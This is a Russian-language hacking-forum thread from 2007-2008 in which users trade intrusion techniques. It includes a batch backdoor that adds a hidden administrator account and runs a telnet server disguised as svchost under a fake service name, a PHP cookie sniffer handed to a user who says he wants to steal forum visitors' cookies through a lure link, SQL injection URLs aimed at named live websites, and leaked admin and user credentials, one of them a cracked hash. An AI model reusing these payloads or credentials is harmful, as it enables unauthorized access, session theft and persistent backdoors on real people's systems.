Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    ---bat файл---
    Code:
    @echo off
    net localgroup TelnetClients /add
    net user admin pass /add
    net localgroup Administratoren admin /add
    net localgroup TelnetClients admin /add
    cd %windir%\system32
    ECHO Windows Registry Editor Version 5.00>0.reg
    ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
    ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
    ECHO "TelnetPort"=dword:000003F2>>0.reg
    ECHO "MaxConnections"=dword:0000000a>>0.reg
    ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
    ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
    ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
    ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
    regedit /s 0.reg && DEL 0.reg
    COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
    assoc .exeя=exefile
    sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
    "svchost.exeя" /service
    sc description WMI-Client "Microsoft WMI-Client"
    sc start WMI-Client
    После запуска этого батника к компу можно коннектится телнетом
     
  2. maximkafun

    maximkafun New Member

    Joined:
    19 May 2008
    Messages:
    25
    Likes Received:
    3
    Reputations:
    -9
    Всем доброго время суток...У меня такой вопрос,знаю что не мало обсуждался,но именноо то что мне нужно я не нашел(может плохо искал,но не нашел)
    Мне нужен пхп-скрипт для кражи "печенюшек" с того сайта/форума которого он перешел на эту страницу...Тоесть,я например даю ссылку пользователлю форума и говорю посмотри классные девки,он переходит на ссылку (где спрятан скрипт кражи кукисов) и все его куки сохраняются в отдельный файл...у меня когда то был такой,но как грицо СПЛЫЛ...не ставьте мне "-",я только новичёк,и вроде обратился по теме,или киньте хотя бы ссылку где можна это взять...заранее благодарен
    Кто напишет в ПМ,буду оч сильно благодарен!
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Invalid query: Can't read dir of './db17222m_231107/' (errno: 13)

    Кто встречал такую ошибку ? Вылетела при выборе из information_schema.tables. Версия пятая точно: )
     
    #2083 Велемир, 28 May 2008
    Last edited: 28 May 2008
  4. maximkafun

    maximkafun New Member

    Joined:
    19 May 2008
    Messages:
    25
    Likes Received:
    3
    Reputations:
    -9
    дай plz ссылку на сниффер и скрипт этот
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Он на ачате валяется=,на сайте кажись=)).Ссылку ща не помню ибо давнон е пользывался.Так же в гугле их много:)
     
  6. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    2maximkafun, омг, учи родной язык для начала :).
    PHP:
    <?php
    $fp 
    fopen("log.log""a");
    fwrite($fp"FROM: ".$SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]);
    fclose($fp);
    ?>
    Этот сниффер записывает все данные в файл log.log, пришедшие методом "GET". Залей его на сервер и будет тебе счастье :). Но мне кажется, что это не для тебя. Попробуй сервис - s.netsec.ru. Позволяет создавать индивидуальные снифферы без напряга, респект GreenBear! Только на серве тех. работы сейчас, ГринБир говорит, что скоро все будет :)
    З.Ы. Тебя посадят.
     
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ,сломал тут сайт www.zaishu.com.оказалсо БОЯНским)(.тык вот из таблицы adminrights вытащил логин и пароль админа :

    admin:zaishu62.В мускул доступа нет)).Но понт в том,что этот грёбаный акк никуда не подходит(даже после того,как я прошёлся по открытым портам аля фтп,8080,5100 и т.д.: ))).нашёл там папку админскую(название забыл()),пасс тож не подошёл.Помогите кто-нибудь узнать,от чего он)).
     
  8. maximkafun

    maximkafun New Member

    Joined:
    19 May 2008
    Messages:
    25
    Likes Received:
    3
    Reputations:
    -9
    хм...чтото он ничего не пишет кроме FROM: DATA:
    ничего не принимает,или я чтто не так зделал...вснунул скрипт в страничку index.php, залил
    на хост, на форуме создал темку из неё ссылку на страницу, сам переходил и пользователи переходили,но кроме этого "FROM: DATA:" ничего не пишет,что не так?
     
  9. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Писал не проверяя просто.
    PHP:
    <?php
    $fp 
    fopen("log.log""a");
    fwrite($fp"FROM: ".$_SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]."\r\n");
    fclose($fp);
    ?>
    Так лучше. В DATA тоже ничего не будет, пока GET'ом что-нибудь не передать. Например, index.php?something. Кукисы на JS: +document.cookie добавлять к УРЛу ссылки на сниффер.
     
  10. Demetra

    Demetra Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    48
    Likes Received:
    8
    Reputations:
    0
    Zet36,хсс в самый раз,хтмл знаю,вот яву незнаю,пихала в формы её.буду пробовать
     
  11. Demetra

    Demetra Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    48
    Likes Received:
    8
    Reputations:
    0
    белая страница,наверна нету бага
     
  12. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,version()/* 5.0.15
    пробуем ... ==> http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,table_name+from+INFORMATION_SCHEMA.TABLES/* Пишет Illegal mix of collations for operation 'UNION', вроде связано с кодировкой, но пробую кодировки и ниодна не подходит(((
     
  13. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Элементарно Ватсон, Аес решает

    cmd> POST /index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(TABLE_N AME,0x71),0x71)+from+information_schema.tables/* HTTP/1.0
     
    #2093 Constantine, 28 May 2008
    Last edited: 29 May 2008
  14. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Тьфу, забыл))))) спс!!!
     
  15. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    А ещё,
    http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ NAME,0x71),0x71)+from+information_schema.columns+w here+table_name=chr(39).chr(117).chr(115).chr(101) .chr(114).chr(115).chr(39)+limit+0,1/*
    Так это делается? char='users'
     
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    например, колонки с таблицы USERS:
     
    #2096 sabe, 28 May 2008
    Last edited: 29 May 2008
  17. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,user+from+users/*
    блин, а чё тогда не выходит???
     
  18. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Не из той базы просишь
     
  19. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    все просто..)
    достаем table_schema
    достаем пасс:
    ну в итоге получил пасс и логин чела. чей id=3. т.к. 1,2 нету.)

    anna1;25f9e794323b453885f5181f1b624d0b

    расшивровуем хеш и получаем пасс: 123456789

    но токо вот где вход?)
     
    #2099 sabe, 29 May 2008
    Last edited: 29 May 2008
  20. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    А как в найти имена баз???
     
Thread Status:
Not open for further replies.